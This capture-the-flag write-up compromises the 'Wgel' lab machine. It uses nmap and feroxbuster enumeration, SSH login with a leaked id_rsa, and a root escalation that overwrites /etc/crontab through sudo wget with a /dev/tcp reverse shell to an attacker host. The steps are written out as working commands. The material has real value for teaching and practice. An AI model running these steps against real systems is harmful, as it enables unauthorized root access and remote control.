Wgel CTF

This report documents the process of successfully compromising the "Wgel" Capture the Flag (CTF) machine. The attack path involved identifying an exposed SSH private key through web directory enumeration, gaining initial access as a low-privileged user, and escalating privileges to root by exploiting a misconfigured wget binary allowed to be run with sudo. The final privilege escalation leverages wget to overwrite the system's crontab, injecting a reverse shell command.

1. Reconnaissance and Enumeration

1.1. Initial Port Scan

export TARGET_IP=10.10.103.164  # Best practice: Store the IP in a variable
nmap -p- --min-rate 5000 -oN initial_scan $TARGET_IP

Results:

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

1.2. Web Server Enumeration

We focused on the web server (port 80) for further enumeration.

1.2.1. Source Code Inspection

Examining the source code of the main page (view-source:http://$TARGET_IP/) revealed a comment:

<!-- Jessie don't forget to udate the webiste -->

This comment strongly suggests a potential username: jessie. This information is valuable for later stages, such as brute-forcing or attempting to use default credentials.

2.2.2. Directory and File Enumeration

We used feroxbuster to perform directory and file brute-forcing, looking for hidden content:

feroxbuster -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt -o ferox_scan.txt

Key Findings:

    GET        9l       28w      316c http://10.10.103.164/sitemap => http://10.10.103.164/sitemap/
    GET        9l       28w      321c http://10.10.103.164/sitemap/.ssh => http://10.10.103.164/sitemap/.ssh/
    GET       27l       33w     1675c http://10.10.103.164/sitemap/.ssh/id_rsa

Critically, feroxbuster discovered a publicly accessible SSH private key (id_rsa) within the /sitemap/.ssh/ directory. This is a severe security misconfiguration.

3. Initial Access (User: jessie)

3.1. Obtaining and Using the Private Key

We downloaded the id_rsa file and prepared it for use with SSH:

wget http://$TARGET_IP/sitemap/.ssh/id_rsa -O id_rsa_jessie
chmod 600 id_rsa_jessie

We then used the private key to connect to the target machine as the user jessie:

ssh -i id_rsa_jessie jessie@$TARGET_IP

This successfully established an SSH session as jessie.

4. Privilege Escalation (jessie -> root)

4.1. Enumerating Privileges

Once inside, we checked jessie's sudo privileges:

sudo -l

Output:

User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

This output reveals two important points:

jessie can run any command as any user (the first line is usually present and not a vulnerability).
jessie can run /usr/bin/wget as root without a password. This is the key to our privilege escalation.

4.2. Exploiting `wget`

The ability to run wget as root allows us to read and, crucially, write arbitrary files on the system. We'll use this to overwrite the /etc/crontab file, injecting a reverse shell command that will be executed by the root user.

4.3. Crafting the Malicious Crontab

We created a modified crontab file on our attacking machine:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* *    * * *   root     bash -c "sh -i >& /dev/tcp/<YOUR_ATTACKER_IP>/6666 0>&1"

* * * * * root ...: This line adds a new cron job that runs every minute as the root user.
bash -c "sh -i >& /dev/tcp/<YOUR_ATTACKER_IP>/6666 0>&1": This is a standard reverse shell command. It creates an interactive shell (sh -i) and redirects its input, output, and error streams (>& ... 0>&1) to a TCP connection on our attacking machine's IP address and port 6666. Replace <YOUR_ATTACKER_IP> with your actual attacking machine's IP address.

4.4. Hosting and Deploying the Payload

We use a python http server to host the malicious crontab.

Attacker Machine
nano crontab # Paste the content above
python3 -m http.server 80

Target Machine
sudo wget <YOUR_ATTACKER_IP>/crontab -O /etc/crontab

sudo wget ... -O /etc/crontab: This uses wget (running as root) to download our malicious crontab file and overwrite the system's /etc/crontab.

4.5. Receiving the Reverse Shell

On our attacking machine, we set up a netcat listener:

Attacker Machine
nc -lvnp 6666

Within a minute, the cron job will execute, and we should receive a reverse shell connection as root:

id # uid=0(root) gid=0(root) groups=0(root)

1. Reconnaissance and Enumeration​

1.1. Initial Port Scan​

1.2. Web Server Enumeration​

1.2.1. Source Code Inspection​

2.2.2. Directory and File Enumeration​

3. Initial Access (User: jessie)​

3.1. Obtaining and Using the Private Key​

4. Privilege Escalation (jessie -> root)​

4.1. Enumerating Privileges​

4.2. Exploiting wget​

4.3. Crafting the Malicious Crontab​

4.4. Hosting and Deploying the Payload​

4.5. Receiving the Reverse Shell​